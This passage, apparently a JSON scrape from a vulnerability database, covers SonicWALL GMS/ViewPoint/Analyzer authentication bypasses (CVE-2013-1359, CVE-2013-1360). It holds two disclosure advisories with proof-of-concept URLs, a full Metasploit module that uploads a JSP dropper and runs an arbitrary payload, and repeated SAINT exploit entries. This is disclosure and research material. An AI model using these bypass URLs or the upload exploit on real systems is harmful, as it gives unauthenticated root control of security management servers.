111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/appliance/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1359\r\n CVSS Base Score: 10\r\n Impact: 10\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n Advisory ID: NSOADV-2013-001\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-001.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. 
Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a built-in function to skip the\r\nsession check of the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a request\r\nto the UMA Interface (/appliance/) with the parameter\r\n"skipSessionCheck=1".\r\n\r\nThe attacker gains full administrative access to the interface and\r\ncould execute code with root or SYSTEM permissions, which leads to\r\na full compromisation of the system.\r\n\r\n\r\n\r\nProof of Concept:\r\n=================\r\n\r\nhttp://host/appliance/applianceMainPage?action=status&skipSessionCheck=1\r\n\r\nThe remote Root/System exploit is attached.\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. 
calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-01-21T00:00:00", "title": "NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28968", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28968", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:51", "description": "", "published": "2013-01-18T00:00:00", "type": "packetstorm", "title": "DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "PACKETSTORM:119639", "href": "https://packetstormsecurity.com/files/119639/DELL-SonicWALL-GMS-Viewpoint-Analyzer-Authentication-Bypass.html", "sourceData": "`______________________________________________________________________ \n-------------------------- NSOADV-2013-002 --------------------------- \n \nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) \n______________________________________________________________________ \n______________________________________________________________________ \n \n
Title: SonicWALL GMS/Viewpoint/Analyzer \nAuthentication Bypass (/sgms/) \nSeverity: Critical \nCVE-ID: CVE-2013-1360 \nCVSS Base Score: 9 \nImpact: 8.5 \nExploitability: 10 \nCVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C \nAdvisory ID: NSOADV-2013-002 \nFound Date: 2012-04-26 \nDate Reported: 2012-12-13 \nRelease Date: 2013-01-17 \nAuthor: Nikolas Sotiriu \nWebsite: http://sotiriu.de \nTwitter: http://twitter.com/nsoresearch \nMail: nso-research at sotiriu.de \nURL: http://sotiriu.de/adv/NSOADV-2013-002.txt \nVendor: DELL SonicWALL (http://www.sonicwall.com/) \nAffected Products: GMS \nAnalyzer \nUMA \nViewPoint \nAffected Platforms: Windows/Linux \nAffected Versions: GMS/Analyzer/UMA 7.0.x \nGMS/ViewPoint/UMA 6.0.x \nGMS/ViewPoint/UMA 5.1.x \nGMS/ViewPoint 5.0.x \nGMS/ViewPoint 4.1.x \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status: Vendor released a patch (See Solution) \nDiscovered by: Nikolas Sotiriu \n \n \n \nBackground: \n=========== \n \nThe SonicWALL\u00ae Global Management System (GMS) provides organizations, \ndistributed enterprises and service providers with a powerful and \nintuitive solution to centrally manage and rapidly deploy SonicWALL \nfirewall, anti-spam, backup and recovery, and secure remote access \nsolutions. 
Flexibly deployed as software, hardware, or a virtual \nappliance, SonicWALL GMS offers centralized real-time monitoring, and \ncomprehensive policy and compliance reporting. For enterprise customers, \nSonicWALL GMS streamlines security policy management and appliance \ndeployment, minimizing administration overhead. Service Providers can \nuse GMS to simplify the security management of multiple clients and \ncreate additional revenue opportunities. For added redundancy and \nscalability, GMS can be deployed in a cluster configuration. \n \n(Product description from Website) \n \n \n \nDescription: \n============ \n \nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that \nallows an unauthenticated, remote attacker to bypass the Web interface \nauthentication offered by the affected product. \n \nThe vulnerability is attributed to broken session handling in the \npassword change process of the web application. \n \nAn attacker may exploit this vulnerability by sending a specially \ncrafted request to the SGMS Interface (/sgms/). \n \nThe attacker gains full administrative access to the interface and \nfull control over all managed appliances, which could lead to a full \ncompromise of the organisation. \n \n \n \nProof of Concept : \n================== \n \nAccess the following URL to log in to the sgms interface: \n \nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 \n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 \n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 \n00000000001 \n \nIf the Console is not directly shown, type any password you \nwant in the change password dialog twice and hit submit to log in. \n \nMaybe you need to access the following URL after this process: \n \nhttp://host/sgms/auth \n \n \n \nSolution: \n========= \n \nInstall Hotfix 125076.77. 
(Download from www.mysonicwall.com) \n \n \n \nDisclosure Timeline: \n==================== \n \n2012-04-26: Vulnerability found \n2012-12-12: Sent the notification and disclosure policy and asked \nfor a PGP Key (security@sonicwall.com) \n2012-12-13: Sent advisory, disclosure policy and planned disclosure \ndate (2012-12-28) to vendor \n2012-12-18: SonicWALL analyzed the finding and wishes to delay the \nrelease to the 3. calendar week 2013. \n2012-12-18: Changed release date to 2013-01-17. \n2012-12-20: Patch is published \n2013-01-17: Release of this advisory \n \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/119639/NSOADV-2013-002.txt"}, {"lastseen": "2016-12-05T22:23:04", "description": "", "cvss3": {}, "published": "2013-01-25T00:00:00", "type": "packetstorm", "title": "SonicWALL GMS 6 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2013-01-25T00:00:00", "id": "PACKETSTORM:119808", "href": "https://packetstormsecurity.com/files/119808/SonicWALL-GMS-6-Arbitrary-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a code execution flaw in SonicWALL GMS. It exploits two \nvulnerabilities in order to get its objective. 
An authentication bypass in the \nWeb Administration interface allows to abuse the \"appliance\" application and upload \nan arbitrary payload embedded in a JSP. The module has been tested successfully on \nSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual \nAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run \nsuccessfully while testing, shell payload have been used. \n}, \n'Author' => \n[ \n'Nikolas Sotiriu', # Vulnerability Discovery \n'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-1359'], \n[ 'OSVDB', '89347' ], \n[ 'BID', '57445' ], \n[ 'EDB', '24204' ] \n], \n'Privileged' => true, \n'Platform' => [ 'win', 'linux' ], \n'Targets' => \n[ \n[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 17 2012')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) \n], self.class) \nend \n \n \ndef on_new_session \n# on_new_session will force stdapi to load (for Linux meterpreter) \nend \n \n \ndef generate_jsp \nvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_data = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_counter = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_comb = 
Rex::Text.rand_text_alpha(rand(8)+8) \nvar_exe = Rex::Text.rand_text_alpha(rand(8)+8) \n@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_proc = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8) \n \njspraw = \"<%@ page import=\\\"java.io.*\\\" %>\\n\" \njspraw << \"<%\\n\" \njspraw << \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\" \njspraw << \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\" \njspraw << \"String #{var_data} = \\\"\\\";\\n\" \n \njspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\" \njspraw << \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\" \njspraw << \"}\\n\" \n \njspraw << \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\" \njspraw << \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\" \n \njspraw << \"int #{var_numbytes} = #{var_inputstream}.available();\\n\" \njspraw << \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\" \njspraw << \"#{var_inputstream}.read(#{var_bytearray});\\n\" \njspraw << \"#{var_inputstream}.close();\\n\" \n \njspraw << \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\" \njspraw << \"for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\\n\" \njspraw << \"{\\n\" \njspraw << \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\" \njspraw << \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\" \njspraw << \"int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\\n\" \njspraw << \"#{var_comb} <<= 4;\\n\" \njspraw << \"#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\\n\" \njspraw << \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\" \njspraw << \"}\\n\" \n \njspraw << 
\"#{var_outputstream}.write(#{var_bytes});\\n\" \njspraw << \"#{var_outputstream}.close();\\n\" \n \njspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\" \njspraw << \"String[] #{var_fperm} = new String[3];\\n\" \njspraw << \"#{var_fperm}[0] = \\\"chmod\\\";\\n\" \njspraw << \"#{var_fperm}[1] = \\\"+x\\\";\\n\" \njspraw << \"#{var_fperm}[2] = #{var_exepath};\\n\" \njspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\" \njspraw << \"if (#{var_proc}.waitFor() == 0) {\\n\" \njspraw << \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\" \njspraw << \"}\\n\" \n# Linux and other UNICES allow removing files while they are in use... \njspraw << \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\" \njspraw << \"} else {\\n\" \n# Windows does not .. \njspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\" \njspraw << \"}\\n\" \n \njspraw << \"%>\\n\" \nreturn jspraw \nend \n \ndef get_install_path \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\", \n'method' => 'POST', \n'connection' => 'TE, close', \n'headers' => \n{ \n'TE' => \"deflate,gzip;q=0.3\", \n}, \n'vars_post' => { \n'num' => '123456', \n'action' => 'show_diagnostics', \n'task' => 'search', \n'item' => 'application_log', \n'criteria' => '*.*', \n'width' => '500' \n} \n}) \n \nif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/ \nreturn $1 \nend \n \nreturn nil \nend \n \ndef upload_file(location, filename, contents) \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\") \npost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\") \npost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\") \npost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; 
filename=\\\"#{filename}\\\"\") \n \ndata = post_data.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\", \n'method' => 'POST', \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'headers' => \n{ \n'TE' => \"deflate,gzip;q=0.3\", \n}, \n'connection' => 'TE, close' \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn true \nelse \nreturn false \nend \nend \n \ndef check \n@peer = \"#{rhost}:#{rport}\" \n@uri = normalize_uri(target_uri.path) \n@uri << '/' if @uri[-1,1] != '/' \n \nif get_install_path.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \n@peer = \"#{rhost}:#{rport}\" \n@uri = normalize_uri(target_uri.path) \n@uri << '/' if @uri[-1,1] != '/' \n \n# Get Tomcat installation path \nprint_status(\"#{@peer} - Retrieving Tomcat installation path...\") \ninstall_path = get_install_path \n \nif install_path.nil? \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\") \nend \n \nprint_good(\"#{@peer} - Tomcat installed on #{install_path}\") \n \nif target['Platform'] == \"linux\" \n@location = \"#{install_path}webapps/appliance/\" \nelsif target['Platform'] == \"win\" \n@location = \"#{install_path}webapps\\\\appliance\\\\\" \nend \n \n \n# Upload the JSP and the raw payload \n@jsp_name = rand_text_alphanumeric(8+rand(8)) \n \njspraw = generate_jsp \n \n# Specify the payload in hex as an extra file.. 
\npayload_hex = payload.encoded_exe.unpack('H*')[0] \n \nprint_status(\"#{@peer} - Uploading the payload\") \n \nif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex) \nprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\") \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\") \nend \n \nprint_status(\"#{@peer} - Uploading the payload\") \n \nif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw) \nprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\") \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\") \nend \n \nprint_status(\"Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...\") \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/#{@jsp_name}.jsp\", \n'method' => 'GET' \n}) \n \nif res and res.code != 200 \nprint_warning(\"#{@peer} - Error triggering the payload\") \nend \n \nregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\") \nregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119808/sonicwall_gms_upload.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. 
These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UMA contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `skipSessionCheck` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:F3B855C79359E1F0667451D37C614E49", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security 
policies, providing real-time monitoring and alerts, and delivering compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UMA contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `skipSessionCheck` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. 
\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:1D818306CDCE9D06452355B580B07037", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:11", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering 
compliance and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UMA contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `skipSessionCheck` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. 
\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:7A9FC357D019902C8221DA08FCAAE376", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:24", "description": "Added: 03/18/2013 \nCVE: [CVE-2013-1359](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359>) \nBID: [57445](<http://www.securityfocus.com/bid/57445>) \nOSVDB: [89347](<http://www.osvdb.org/89347>) \n\n\n### Background\n\nDell SonicWALL has several [management and reporting solutions](<http://www.sonicwall.com/us/en/products/Centralized_Management_Reporting.html>) which provide a centralized architecture for creating and managing security policies, providing real-time monitoring and alerts, and delivering compliance 
and usage reports from a single management interface. These products include SonicWALL ViewPoint (being discontinued and replaced by SonicWALL Analyzer), Global Management System (GMS), and the Universal Management Appliance (UMA). \n\n### Problem\n\nVarious versions of Dell SonicWALL ViewPoint, Analyzer, GMS and UMA contain an error within the authentication mechanism of the web interface which can be exploited to bypass the authentication mechanism by setting the `skipSessionCheck` parameter to 1. \n\n### Resolution\n\nObtain HotFix 125076.77 from <http://www.mysonicwall.com> and apply the appropriate files for your product. \n\n### References\n\n<http://secunia.com/advisories/51758/> \n\n\n### Limitations\n\nThis exploit was tested against SonicWALL GMS 7.0 SP1 on Windows Server 2003 SP2 English and Windows Server 2008 SP2 (with DEP OptOut). It was also tested against SonicWALL GMS Virtual Appliance 7.0 SP1 on SonicWALL Linux 2.6.23.8. \n\nThis exploit supports IPv6 on Windows platforms, but not on GMS Virtual Appliance platforms. 
\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-03-18T00:00:00", "type": "saint", "title": "SonicWall Multiple Products skipSessionCheck Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:C7FDFE5DCFFF03B22ABA033E11C9F99B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", 